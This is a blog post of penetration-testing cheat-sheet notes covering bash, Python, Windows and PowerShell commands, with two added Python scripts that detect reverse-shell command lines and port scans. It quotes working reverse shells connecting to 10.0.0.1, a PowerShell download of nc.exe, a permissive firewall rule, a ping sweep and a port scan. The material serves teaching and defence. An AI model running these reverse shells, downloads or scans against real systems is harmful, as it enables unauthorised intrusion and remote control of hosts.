We’re moving house, so the old SANS Pentesting posters and notes are headed for the recycle bin :(
I wouldn’t bother reading this post if I were you. Visit SANS.org or Google for “SANS posters”. They’re much better than anything here. Or, better still, do SANS 660.
Bash Notes
Pivot across the network via IPv6, so your IPv4-only tools can reach an IPv6 host:
sudo socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::6bb8:6aaa:fe40:9864]:80
then
nikto -host 127.0.0.1 -port 8080
Note that a link-local fe80:: address is only routable with a zone index naming the outgoing interface (e.g. fe80::6bb8:6aaa:fe40:9864%eth0); a global or ULA address needs no suffix.
What's my public IP, as seen from this machine?
curl -4 icanhazip.com
or dig +short myip.opendns.com @resolver1.opendns.com
or wget -qO- ifconfig.me/ip
Image a partition and stream it, compressed, over SSH to another host:
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C me@10.0.0.0 "cat >/tmp/image.dd"
conv=noerror keeps dd going past read errors and sync pads each short or failed block with zeros, so offsets in the image still match the source. Hash the image on both ends to confirm it arrived intact.
The bash reverse shell:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Encode: echo "test" | base64
and decode: echo "dGVzdAo=" | base64 -d
Quick website clone: wget -r -nH $URL
Python
Upgrade a raw shell to a proper PTY: python -c 'import pty; pty.spawn("/bin/bash")'
Python reverse Shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
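From the defender's side, the bash reverse shell, the pty.spawn upgrade and the Python socket/dup2 one-liner above all leave distinctive command lines in process-execution telemetry. The following is an added example (not from the original post or from SANS) that runs a few pattern rules over such records; the record shape and the sample records are constructed here, the first three being the page's own one-liners and the last two benign commands from the same notes.

```python
"""Flag process command lines that match the reverse-shell patterns on this page."""
import re

# name -> regex over the full command line. Written for the one-liners quoted
# above; real coverage needs many more rules and decoding of obfuscated args.
RULES = {
    # bash network redirection: /dev/tcp/<host>/<port> or /dev/udp/...
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/\S+/\d+"),
    # interactive PTY allocation from a python one-liner
    "pty_spawn": re.compile(r"pty\.spawn\("),
    # socket connect followed by dup2 of the socket over stdio
    "python_socket_dup2": re.compile(r"socket\.socket\(.*\.connect\(.*dup2\("),
}


def classify(cmdline):
    """Return the sorted names of every rule that matches ``cmdline``."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(records):
    """records: iterable of dicts with 'pid', 'user' and 'cmdline' (constructed
    here, but the same fields come out of an execve audit or EDR feed).
    Returns [(pid, user, [rule names]), ...] for the records that matched."""
    hits = []
    for rec in records:
        tags = classify(rec["cmdline"])
        if tags:
            hits.append((rec["pid"], rec["user"], tags))
    return hits


# Constructed sample records: 101-103 are the page's one-liners, 104-105 are
# ordinary commands from the same notes and must not be flagged.
SAMPLE_RECORDS = [
    {"pid": 101, "user": "www-data",
     "cmdline": "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"},
    {"pid": 102, "user": "www-data",
     "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"pid": 103, "user": "www-data",
     "cmdline": ("python -c 'import socket,subprocess,os;"
                 "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                 's.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); '
                 "os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
                 'p=subprocess.call(["/bin/sh","-i"]);\'')},
    {"pid": 104, "user": "alice", "cmdline": "python3 -m http.server 8888"},
    {"pid": 105, "user": "alice", "cmdline": "curl -4 icanhazip.com"},
]


if __name__ == "__main__":
    for pid, user, tags in scan(SAMPLE_RECORDS):
        print(f"pid {pid} ({user}): {', '.join(tags)}")
```

Substring rules like these are a cheap first pass only: a base64-wrapped or split command line walks straight past them, so pair them with network telemetry (an outbound connection from a web-server or interpreter process to an unusual port) rather than relying on the command line alone.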
Python 2 web server: python -m SimpleHTTPServer 8888
Python 3: python -m http.server 8888
Python web client
python3 -c 'import urllib.request; urllib.request.urlretrieve("http://192.168.1.1","/tmp/thething.html")'
Debug: python -m pdb exploit.py
Windows
Turn a Windows box into a wireless access point:
netsh wlan set hostednetwork mode=allow ssid=nothingsketchy key=mypass && netsh wlan start hostednetwork
Build an IPv6 pivot (the netsh equivalent of the socat pivot above):
netsh interface portproxy add v4tov6 listenport=8080 listenaddress=0.0.0.0 connectport=<RPort> connectaddress=<RHost>
Keep an eye on network connections to the machine (refreshing every second):
netstat -naob 1 | find "<ip or port>"
Process list: wmic process list full
Tasks and Services: tasklist /svc
PowerShell
Ping all the things
1..255 | % { echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | select-string ttl}
The PS web client (the cheeky way since Windows 8 / PowerShell 3, where wget is an alias for Invoke-WebRequest):
wget "http://10.0.0.1/nc.exe" -outfile "c:\temp\nc.exe"
But you should probably also know the .NET way, which works on older PowerShell too:
(New-Object System.Net.WebClient).DownloadFile("http://10.0.0.1/nc.exe", "c:\temp\nc.exe")
Check Firewall Rules: get-NetFirewallRule -all
or get-netfirewallrule -all | export-csv "mycsv.csv"
Add a firewall rule (New-NetFirewallRule creates an inbound rule by default): New-NetFirewallRule -action Allow -displayname LegitException -remoteAddress 10.10.10.10
TCP connect scan of ports 1-1024 (the connect exception for a closed port is sent to the error stream, which 2>$null discards):
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).connect("<IP>",$_)) "Port $_ is open"} 2>$null
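The ping sweep and the TcpClient port scan above are noisy: one source touching many ports on one host, or many hosts with ICMP, inside a short window. The following added example (not from the original post or from SANS) parses constructed connection-log lines and flags both patterns with a sliding window per source address. The simplified line layout ("date time action proto src dst sport dport", with "-" for ICMP ports), the thresholds and the sample traffic are assumptions; adapt parse_log to whatever your firewall actually writes.

```python
"""Detect TCP port scans and ICMP host sweeps in connection-log lines."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed thresholds: distinct destination ports on one host, or distinct
# hosts pinged, from a single source inside WINDOW. Tune for your network.
WINDOW = timedelta(seconds=60)
PORT_THRESHOLD = 20
HOST_THRESHOLD = 10
TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse_log(text):
    """Parse constructed lines of the form
    'YYYY-MM-DD HH:MM:SS ACTION PROTO SRC DST SPORT DPORT' into event dicts.
    Comment lines starting with '#' are skipped; ICMP lines carry '-' ports."""
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, action, proto, src, dst, _sport, dport = line.split()
        events.append({
            "ts": datetime.strptime(f"{date} {time}", TS_FMT),
            "action": action, "proto": proto, "src": src, "dst": dst,
            "dport": None if dport == "-" else int(dport),
        })
    return events


def detect(events):
    """Return {src: {alert names}} for sources whose traffic inside any
    WINDOW-long span looks like a port scan or a host sweep."""
    events = sorted(events, key=lambda e: e["ts"])
    recent = defaultdict(deque)       # src -> events within the window
    alerts = defaultdict(set)
    for ev in events:
        window = recent[ev["src"]]
        window.append(ev)
        while ev["ts"] - window[0]["ts"] > WINDOW:   # drop stale events
            window.popleft()
        ports_per_host = defaultdict(set)
        pinged_hosts = set()
        for e in window:
            if e["proto"] == "TCP":
                ports_per_host[e["dst"]].add(e["dport"])
            elif e["proto"] == "ICMP":
                pinged_hosts.add(e["dst"])
        if any(len(p) >= PORT_THRESHOLD for p in ports_per_host.values()):
            alerts[ev["src"]].add("tcp_port_scan")
        if len(pinged_hosts) >= HOST_THRESHOLD:
            alerts[ev["src"]].add("icmp_host_sweep")
    return dict(alerts)


def build_sample_log():
    """Constructed sample: 10.0.0.5 probes 30 ports on 192.168.1.20 and pings
    15 hosts; 10.0.0.7 makes three ordinary HTTPS connections."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = ["# date time action proto src dst sport dport (constructed)"]
    for i in range(30):
        t = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f"{t} DROP TCP 10.0.0.5 192.168.1.20 {51000 + i} {i + 1}")
    for h in range(1, 16):
        t = (base + timedelta(seconds=30 + h)).strftime(TS_FMT)
        lines.append(f"{t} DROP ICMP 10.0.0.5 192.168.1.{h} - -")
    for i in range(3):
        t = (base + timedelta(seconds=10 * i)).strftime(TS_FMT)
        lines.append(f"{t} ALLOW TCP 10.0.0.7 192.168.1.20 {52000 + i} 443")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


if __name__ == "__main__":
    for src, names in detect(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {', '.join(sorted(names))}")
```

Windows Defender Firewall can log dropped packets to pfirewall.log once logging is enabled, and most perimeter firewalls export similar per-connection records; the sliding-window logic is the same whichever source feeds parse_log.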